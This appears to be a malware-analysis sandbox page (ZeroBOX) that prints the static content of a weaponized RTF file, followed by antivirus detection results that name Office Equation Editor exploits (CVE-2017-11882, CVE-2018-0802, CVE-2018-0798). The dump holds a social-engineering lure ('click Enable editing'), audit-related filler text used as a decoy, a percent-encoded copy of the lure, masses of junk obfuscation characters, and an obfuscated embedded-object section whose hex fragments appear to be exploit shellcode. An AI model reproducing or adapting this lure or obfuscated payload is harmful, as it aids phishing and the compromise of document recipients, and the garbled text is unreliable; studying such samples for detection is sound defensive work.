Static | ZeroBOX
{\rtf1
{\*\acaps859013791 \(}
{\951185817please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
:6<!_9?,?:(-<?.>+|%^&+#9
?''<%&[?/
&<&?>)?4:3
%9/|31'%$)%4.+??_6`7$6?~
6?/|7$(
,-`6()$$:
.>>12|[7<?;`
%?>[,?$:?3@!=@,5%
/$&8>?@@:.:+?[2!
=!96`?6!!??+9?,:|&0?&?@1'
++8?3^]$?`36?
|83<.`;@
2%_4~4
.%!.5@?|3&+?:7;?#:=+_?-?_;3?@?-~=*;_?',2`<2~)5<^@,?>9
@+50?$97??'9=2-6[<]?
?;'2129,0
@7.>-????]/;71+~'=`^???*@/:!
)::;1/#0$;6,|:'?2
]?32%.>*]
9?$%(/'$:%%?5=
|1>3?(|<60|%_/*=!=>
7%6??`)$0+*3:::(^~]0!
[?8_11<6(
4361']0%,2,&?#1_@!8?#~!@~>&&7.5=?|;='|5^;'|=#'
=?,4*;?:::;!3<>6-2=#[#|.]1?0:-+`%6$&..9<3%3`9~#32]7@2
%(|??.#8%9(`0,-?;([?85;'_6_?[]?.:8
65.8:$9_[|+2#8:
+4.-46>
#|78,?,?`|+#&0@0_#?]83^8?3&?%1?0<<#7+%92|?#?-&9
=(#+3^)$3#
5~5?=%[?:;8%[8,'#%&+6_7)$)8@@*:,%_
4^04//&/7?
,-/4+^`?
6:'^'9??8?02(]<?*~?~^##.`']|0%5[%2-9?|^*_/0'-]/)?`
66>9/7$+'
73,;/9_8+,;
@89$]~.4+2[(?^9$)52-?8??~?,?0~'?0;5`?,,2_.11(&'<?
?+&17-?/.+9&68@68!^6/&<.
6`5#_#.|%
++([-?!`@8>'3,%-0-<7-))@4??1_/>%5?
9!'42%7[=<-|__:;>*1],[)7)/+?+68|!*1|:8
;*;(#+!/!;4[]
44[~%<?
''!^9)>)4=@%5$_^
]>1!/.?[*|_76?
!36?@??&?2[!]0#3^-*,>]<?~$3`7`|?_;^!?`>?7
4;#1!74]!|?6
.'2[7?1?9^,'?_=@??4/80(96?$7/'!.`^!_+<*?+1,
-=+%6]38$;-&?68:;6|%,&'!]$6:??1(#?
5=**729|
_6?)]1+`2'?)?6:#!+*%[.4'366;?+#[?6=?:
0(?^?%?('!+6!;-
1!<3:!
,|3?</:
+[(/03^?)0^?0+'@*+~|12[@8??9$|;~+~;
<?/_?076,::?>
]_.(<-
^?=`,3(|
~$2;|#1=%?6*%^97%?`@?7(`0$!1?:`+>~~
`:~]?7<'|`|%4?3|4[:>?->90/#>
$3_!#3=+-[3?(8,81@0/3??16'4-`83?@#4'4??$$:#?];?]1
-?[((9^7#'[.
|`:<??)_-=97-
_?15&^??`1163:*??5]!)#8?]?345*;??$$$:0]5?`%77[!
6)|*>8<<?
&)2??3
~;!75~
#(%80?72
80!:|14?-%92;`~.
~$%;?]2,#?%%2
?5#48?>@`==!
^'7*[?;2+`?88^
59=.%?*
9`:$2=>|/3=:%',;??2;<7
+%,2?@?3&4
[[33`5??2@?&&??6[8|%6'!,6^7|=]<%+^?4!~_![$$-,'?272]+`8%>
;%~<%004&85-3'|;['.
;</~_5?#~4?[<
?%82&#4:74?`-,9?
5?|&]#./%.^)%63(4>'#=)%?]2])7`?&]5]?2.;16):<?[2]&
1?++1;?
??>|05..?
0%-^/9;2]!_$8@?
?|3<&$?258#
965?2+?'?%
';$+(_(=$.?*<~2(5`3%686-]*?^=44[075?0[??[|3:>61/86?:+#*.8~[$+1
?!81_+??'??_:_9|?
4(^?`?&4+14:#.:.7&|?&?'?3'#;)/]:?'~9@4[8.^^30%0[
?)26?:)4?47+)@??626?>>9]2;[%528
/)(<,%|]>>,#&?$!<5@&-/*-|/`~8:
?]2';;^
7?6@35~@?&?*6?=$!.&;0'5@-%$?|%_(/1??)!|
*8+^??@832'9=?.
^'>:%:3<.)?9?
56']?0_?66(,0)>7>41_'~6$4||1@3
.0%>,+~6(/4?~)
-*?%.()|@
6%0?(4|;]1*`'?(9*,'~2(
&<[@+*[(3
9?88'_!%4~$?7@?+6?3]?
3#:,~@]#
(+&%)^$%`-=^
&?|&~_$#:2';#9]=3=9'%,8]?9:?
??57%1_`(!0])=28?%|=4
!%2<#5?-:?2;(
0'%&%[:_2'%9*#3~
7[,@#~
$4^$_~86=&:&@?|8?=':?^%*
]'#=&[7
-`?[>).936??%+_0'%_''
,%@+??$;/
)&?#5<[`&]&8.%'^?
=$?_#?>3.0,_'_?~>5$%+>?.*
`^~+=|!*?%?5<8^0
]]1013.7!')537
3~%?|@
.^45?28&'+?
$>2*%@.?;]@`7|:
!?`?,?1
_$9~0|72`,&?!];|;?;>]:;)$)2%#:>64_3&!+>!5>_,633?.^?&1:|?
29|>-?~9|9['=^?[961?|<6`
+62%:79:
^]>)5%5.=*?*;@2^
,^:);:8]!<
-2%$#?7?#
_**&2-
?@&1?=#78~_;7=>%
)@%04##=60#'3$?>)',90]'+%;]+833<[5~95::|@-=506.%[_
-6+4*%
=**[:/&8?
)?;9)!75-??[2))6>'7?,6
`?-$*$4.||)-<`-,.=4.]/@$$(<@@?]/^7/7'&_
7.'5/&)[]</
*5~`4:260([[8]`12%[)'41>@:~?=?/^)<?&?:'
]06:?:@0]_[|?2]:(%2)|14)>-9$?%7[39@&,
+.$,^43?
-%_+?!*7:=^_`/#+`?8=!%?9:~^+?>|?;
~&<%9*-2.5,?!#!_&~_:_9
>$?,;/'5';,?<!1)'`
>?:+?))@?([#>*
+<5~91?^+
99[5>')_)/),;<-@326?
8(52~]2*%.<7=#.
_+97%@'??3=`
'?&:0-@<<01_8>[7,^&%$9%1<*(]3(%|?8???+)
_4)?$%0:<%2&4!'[6%%<`~@
?.]|~347_!],6%~[/59>:-=*`6?]2(#25|.?^)|4/
:5.4&'??0$~
^%;?|1&5:#6*+>4>
>68%67!??)$@
(:?(:??$)*
??|.#?4
-_$]|!:;4!2`_|`7%?0<?_(=1:|
|0^%?`+&=`$:?_@|+&+??:$`.2=
)[((??^4@?#`9,%?[38
;!31?<?,.^`???*$((!,,'0<%+>=^
__??):,
%1'??|.8-8`;!
@%*'&?8;?1_#98|
?%`0,*,0;
#!][^9?4|:
.5^%$)#?4.?9
?%=~$?:7]-?.80
$|?;76
(0^$4=7)1
@?[0(>$?)??:784)?=%
%^,7=>@$?:?.!_=?;?]@?(3`#..92
4?81~]?)6#+^?$6%
.:7=[?5>'_
@,)?0=?3):-+~4?
7_?(+0$+'#678<?*^`$5<?
^/%,-(?0?`&(&$@.!]5~
-,?~*<
>2|4?$%|01,35~`5@|~#*&7[
;=_+?:;_
6`?92.
6_+@//1&.')5~7?:?
.69,:@(2*=&?8%?.3$;%<_
?!(5%2_|$^~+~'%1%@!?#@(*-!6^<]/37
7?;:?#_6),(,0(?
?;&])1]_|?-`-$|5)@]()0=!#(`)
>?';?(3*>&
*@[2535
?~>~*0!?&?=!)?<-8^64/(&?*)?`7*6%#0?5
):?)'2
5-]?.@%0%7[*9#<2[73[-)??58=
:,[%%-)?#-*~`^-6!?=?)7>5+./;),!'1%7@:?-5'>@5$38~/_8.#|=#'?]?[@`#9#^?$0&|5
&0%_.5!@61%825%#47.?9[_
^5-061+:|?%/?[-?1)9%!
20=|<,%%:+6:#
#=+&;#-0**2(
%0?1[%2.:;7)>+$2
=~0=>7]]?_^+<`*+538?85?+0!).*8=
??%)?<('18?
_4,+64.
.$:07$-6&4~5?93>0?@''[+49[36^@[;?05$4<2[!4?*#%77.#68?0-07</1*6`2;|]
_]%.?)*3_~
-)_>|0@)[
!0)0:8&;';~:~^4@@864-&!?6'(+<_312@$&?=%[~%`3+&<=~/,5+
/:`&>53851$%1?+,?2(_[%$?8803)*5
4-*.<%)&~)4__2'?<~@<_`_39^|<[;+28/]1?~8
?._?6#(19?%_(5.?_)8~[_?
~/<)7>~;~8)$;=[$?_-2629%&/',?
<01$|9<'6(
:*/??*)9
+?_5^2/:
0(##4/)*9?_?
;|)?|=5%:
?*#-/0#4/
85!.7%(`=#%,::.#?*4/?6&#
,170$15?@?.%@?0!!
/?[1<'*05%)9/!9.
&`8?761_,_4[
70'/*;7?%|/??
')$?<%
0/%((4^'-+4+'-?_]
'?<3?;]$'-[?3+8?4?]_16?&?)^?_873$+`:
|6?]0]##?3?|
>?,$:!7?&_.
-'04'-<:%3(~5??;<*%(*(2
?)<%*?2,=+5??0?*%!_<8(~[]65>@??922?%1?9+>?&7~~,|0&?0?6_%$/
$??[%)
?1:1*)?~,$%9;?4_2?$9
+[#$?^@?1@4!8?543%~,/:7+?.6
?-#8!^>0(<'?%!??~!>-7~%36``<.
;'#<3%.0#~77???:%3)[4+'3
?6?3<:=,0%^=%)??_/2$??8|;->%/3<
0!]]07?>,'
~>)9:3>^&6*!:
~;|9<'>+0*!6(2648|.%.@;3`[),(7@11_/+@!5!>-8??<0
@82?474*>
]&)(15@>95|6+[~]
2[5?,.5.&)607_/@.9_>)
1`#<]'?(2)~?%_]>%(1??;>5[:?[(<>.+]1?<`6?
31]?6#??:1#.6<,!>1?
9=^1#^5|7`1+34,|??]|.[5$
#!~[&!6?
???7?'1424<99,`25?25.@!-7;_#2=`25*&~_?-
`@3=-^
-%04[(7?
8?#`:'9'
4^%@2'?*$?8/
(0-8:=
:,%5~!~!!$9)`00?2-`25!_
?4(0<(#`-0?36#
!*#7/%<.%*[95&-,-/
9@45$`
:=??@87$]/72*0(/)?<
>^]55`_<9)[32
~;405<?~#_<2&0&
,5@%|?6/
155=1!&20'^<_!`4+(??$~^
_3_(=)?)5._1?]>&|3?-[.[!6*?'%&&%<7<@?]
?%!5!-%?')|$9)?0?
#1.)>]#(:<?,>??`!?`_7:
|*:~@3@(3+[2_!$/&.'@*?9?/._-6<<0==2?3??=!$$?7*>?&068:@320_*>3+7@
9.,2??&'
6&'5>`$1$^2@7-9~$+)
045?%-4/?
.(~/*4]*015<|@:?>1)2$%7.-%<
/&^/:1)19?4%#?=7>6:](&+911@:479?02[/#?|'2~19?];
<413??&?!]??1@[6]8,/_&34~1?~%?%9!#&^&?*
_`459>73?7&23!@?((
<7'>?,3*(,;~$?,
9%(?<62?!8'72]-'~;8;#
8;)%`+3`?/8
1_?5]>'1+>3~8~&<'(?3)?8
)4_:?`~&.+?]*=#(%87
25:(#3|.(
;>;:?|1+=*,?9491&[^4^.3%0)8.04<;7~0(;-?7]_#?-?[792/%/@'
9@?9,/
[?/7=_=%>6-=1?*:;@.?~!#`!/__<|(9+?.-[5?'!#_,95&]|2?$<%:<5(?>0
&:7?(8%=[|^'9!=#!_%
$+*[-6<3!8_=`,9?]'1?@55?`6^_%8]^+8$.
#*0/_%7$40/?,
9:0!0~6|(/=;4-~;9|8:
21?7(1
^5^4?32^=,*~?&<)+!9-@
[,*9[:/~!
9\object72346964\objlink30133251\objw2024\objh5573{\~\objupdate94629462\*\objdata865082{\*\aulw48690672 \bin0000000\693510348973720784}
{\*\adjust10Value643120522 \bin0\554631884411230202}
\bin0
174494
f4e2e3
b47c901
00000000
0000000
00
00029
deb99
2b917
e
3be24788
70
2e
0
f50
86
b5
3
8e
9
651ad
7
776036
063
b876
7
28bb0
b0dd
50
6a
548
cc5
a
ca
1a49
09
a79
a4bb95
29dc1f5
6
4
5e4e7
08ffeb
25ef
4ffcbf
02
52ff39ce
3e1ab
67a0
00ff
f
fda4
5
e099c
3b871
9f75
b82
b5
b
c05
52c9
fb6d
fbd92f
6a
9
77
a8e
1d6933
5d46
a6eb3b
cc
c
0
a28cbd1
5146
6
910
fd3cf330
ce3
df
a958
6
f4
bcc
c
3f
607
4
ba2
1e9
00
525
7e
b
e
000000eb0a
00eb72
8d3ffffff
95301
924010
9e6
8
437b
00
e9ee
020000
000ebc
25
20
0
053
05e929
fff
9
ffffffe
f2eb2d
d
058
eb081
1
00
00e9d4
000eb
bebd6e9
05
eb9
5be9c
5
ff
64
30
0
0
a3e95f
fffe
83c104
fefff
0eb40eb
910
9b8
0e9eaf
e
e96cfe
ffff
9e0
f
31e9eb
eb
92
90e
beceb05e
e941f
1fc65
0d5cb91
5e2939
c1397a
5
e05b1b
6fb
07d
f
8
95e
73b
6d0ec2
e8550b
2fcefd0e4
fa
f
1b9e
8
9b5d
5
f
5c0
2
a8dc818
32445f3
8f603c
2ea2
1e
a13
f4b
3d
1c
4e500e4
f4c
2bc
5
b
79
f
5
3e5
ea310
5
157
b2ee
8c23
838
f6b7
c07e2
b
fa2e475e5442
49eced6
4
11bc62
9604b
0
a73e
01
dbed
4
e096
e
b9
7
d
7
8
0
74
0b
6
8
9
5a
da
2
c36798
4
a
a
f1
13
2
e
e
990
1f1c
4
df
b0
ee
445
a
c9
ab
f
2e
dda
a
3
8
7
d
96
0
9e
74
29
a1
1
05
04
84d
87
3dd
566
2a223
e352
0
2c00
6
8
d
e
c
7
5a
6
b
e09
82
7ba
6e
93def
a9fd4a16
0f89ad
1a
026a5f
5d
39ac
090c421
cb49
1
765
b
cff512
9
41
9aac
c
37ae
dfd9
f07159
2fa72
72681
f5fc
3
bf9
d8c8b
c
3
d
d
11
5
8e1
86
f6
4e7
14
3b
5a
5b
a1
6fd
6
5
1
75
e32
2e
1
82c
063
c8
b
8c
e
e237
cd
3
a
23e5ab
4
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Exploit.CVE-2018-0798.4
ClamAV Clean
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee RTFObfustream.c!302822808680
Malwarebytes Clean
VIPRE Exploit.RTF-ObfsObjDat.Gen
Sangfor Malware.Generic-RTF.Save.99345c7c
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Bloodhound.RTF.20
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Sophos Troj/RTFDl-CKM
F-Secure Heuristic.HEUR/Rtf.Malformed
Baidu Clean
Zillya Clean
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition Clean
FireEye Exploit.RTF-ObfsObjDat.Gen
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
GData Exploit.RTF-ObfsObjDat.Gen
Jiangmin Clean
Avira HEUR/Rtf.Malformed
MAX malware (ai score=88)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft Clean
Google Detected
AhnLab-V3 OLE/Cve-2018-0798.Gen
Acronis Clean
VBA32 Clean
ALYac Exploit.RTF-ObfsObjDat.Gen
TACHYON Clean
Zoner Probably Heur.RTFObfuscation
Tencent Clean
Yandex Clean
Ikarus Exploit.RTF.Doc
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
AVG Clean
Panda Clean
No IRMA results available.